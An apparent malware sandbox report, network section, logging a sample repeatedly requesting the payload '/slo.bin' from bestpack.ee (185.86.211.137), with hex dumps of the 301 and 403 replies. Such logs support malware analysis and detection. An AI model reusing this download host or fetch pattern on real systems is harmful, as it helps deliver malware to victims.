                                                                                                                      Sep 27, 2024 19:05:14.382500887 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:05:14.600861073 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:14 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      35192.168.11.2049830185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:05:25.727962971 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:05:25.949950933 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      36192.168.11.2049832185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:05:37.082010031 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:05:37.303551912 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:37 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      37192.168.11.2049834185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:05:48.442399979 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:05:48.669481039 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:48 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      38192.168.11.2049836185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:05:59.792244911 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:06:00.009735107 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:59 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      39192.168.11.2049838185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:06:11.117706060 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:06:11.334454060 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:06:11 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      40192.168.11.2049840185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:06:22.460724115 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:06:22.679668903 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:06:22 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      41192.168.11.2049842185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:06:33.788108110 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:06:34.009402990 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:06:33 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.11.2049761185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 16:58:48 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:58:48 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:58:48 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:58:48 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.11.2049763185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 16:58:59 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:00 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:58:59 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:00 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.11.2049765185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 16:59:10 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:11 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:11 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:11 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.11.2049767185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 16:59:22 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:22 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:22 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:22 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.11.2049769185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 16:59:33 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:34 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:34 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:34 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.11.2049771185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 16:59:45 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:45 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:45 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:45 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.11.2049773185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 16:59:56 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 16:59:56 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:56 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 16:59:56 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.11.2049775185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:00:07 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:00:08 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:08 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
